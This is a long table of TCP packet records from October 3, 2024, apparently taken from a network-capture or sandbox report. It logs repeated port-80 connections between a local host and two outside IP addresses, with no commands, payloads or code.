                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.289611101 CEST80414987380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.289686918 CEST498738041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.289763927 CEST498738041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.294892073 CEST80414987380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:40.294965982 CEST498738041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666532993 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666620016 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666635036 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666659117 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666666031 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666675091 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666678905 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666697979 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666712046 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666785002 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.666847944 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667254925 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667299032 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667314053 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667331934 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667356014 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667367935 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667453051 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667469025 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667484045 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667494059 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667519093 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667618036 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667633057 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667659998 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.667682886 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.668190956 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.668232918 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670008898 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670027971 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670046091 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670063019 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670090914 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670092106 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670115948 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670133114 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670171976 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670237064 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670253038 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670283079 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670306921 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670607090 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670619965 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.670653105 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713640928 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713661909 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713680983 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713747025 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.713779926 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755280018 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755351067 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755414963 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755440950 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755470037 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755500078 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755503893 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755538940 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755561113 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755572081 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755605936 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755628109 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755649090 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755656004 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755691051 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755726099 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755754948 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755759954 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755772114 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755794048 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755825996 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755851030 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755860090 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755872011 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.755909920 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756009102 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756042004 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756067991 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756077051 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756088972 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756110907 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756120920 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756145000 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756154060 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756186962 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756294966 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756324053 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756350994 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756359100 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.756369114 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846489906 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846530914 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846595049 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846628904 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846662045 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846673965 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846695900 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846700907 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846730947 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846776962 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846932888 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846966982 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.846999884 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847014904 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847033978 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847044945 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847067118 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847100973 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847112894 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847136021 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847177029 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847198009 CEST80414987582.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:41.847253084 CEST498758041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.293905020 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.298861027 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.299047947 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.299370050 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.304151058 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.927695990 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.927773952 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928045988 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928097010 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928147078 CEST498978041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.928606987 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.932975054 CEST80414989780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.933590889 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.933656931 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.939049959 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:44.944000006 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635402918 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635476112 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635782003 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635832071 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.635845900 CEST499038041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.636277914 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.640649080 CEST80414990380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641078949 CEST80414990980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641163111 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.641239882 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.644335032 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.646313906 CEST80414990980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.646373987 CEST499098041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649095058 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649163961 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.649868965 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:45.654616117 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.334979057 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.335202932 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.335293055 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.342178106 CEST499108041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.342818975 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.349778891 CEST80414991080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.350450993 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.350516081 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.359551907 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.368989944 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.972744942 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.972894907 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973146915 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973495960 CEST499128041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.973932981 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.978468895 CEST80414991280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.978796959 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.981713057 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.981827021 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986831903 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986896992 CEST80414991880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:46.986968040 CEST499188041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.075532913 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.080878019 CEST80414970882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.080935955 CEST497088041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.093470097 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.098422050 CEST80414993882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.098536015 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.099009037 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.103869915 CEST80414993882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.704494953 CEST80414993882.115.223.39192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.704557896 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:42:50.705027103 CEST499388041192.168.2.582.115.223.39
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.699156046 CEST500248041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.699642897 CEST500258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.703912973 CEST80415002480.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.704489946 CEST80415002580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.704744101 CEST500258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.704936981 CEST500258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.709994078 CEST80415002580.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:11.710067987 CEST500258041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:14.794449091 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:14.799501896 CEST80415002680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:14.799609900 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:14.799870968 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:14.804616928 CEST80415002680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.424710989 CEST80415002680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.424964905 CEST80415002680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.425095081 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.425095081 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.425309896 CEST500268041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.425760984 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.430138111 CEST80415002680.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.430623055 CEST80415002780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.430712938 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.431020021 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:15.435790062 CEST80415002780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062750101 CEST80415002780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062845945 CEST80415002780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062880039 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.062925100 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.063189030 CEST500278041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.063607931 CEST500288041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.067941904 CEST80415002780.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.068389893 CEST80415002880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.068454981 CEST500288041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.068525076 CEST500288041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.073580027 CEST80415002880.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:16.073645115 CEST500288041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.097820044 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.102775097 CEST80415002980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.102855921 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.103154898 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.107992887 CEST80415002980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726120949 CEST80415002980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726289988 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726408958 CEST80415002980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726455927 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.726625919 CEST500298041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.727046967 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.731401920 CEST80415002980.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.731806040 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.731884003 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.732194901 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:19.737083912 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728039026 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728095055 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728163958 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728337049 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728373051 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728389025 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728600025 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728935957 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.728986025 CEST500308041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.729201078 CEST500318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.733809948 CEST80415003080.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.734282970 CEST80415003180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.734365940 CEST500318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:20.734483957 CEST500318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:21.019380093 CEST80415003180.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:21.019606113 CEST500318041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:25.788038015 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:25.793108940 CEST80415003280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:25.793198109 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:25.793643951 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:25.798800945 CEST80415003280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428221941 CEST80415003280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428319931 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428427935 CEST80415003280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.428492069 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.429009914 CEST500328041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.429455996 CEST500338041192.168.2.580.78.24.30
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.436976910 CEST80415003280.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.437735081 CEST80415003380.78.24.30192.168.2.5
                                                                                                                                                                                                                                                    Oct 3, 2024 20:43:26.437836885 CEST500338041192.168.2.580.78.24.30
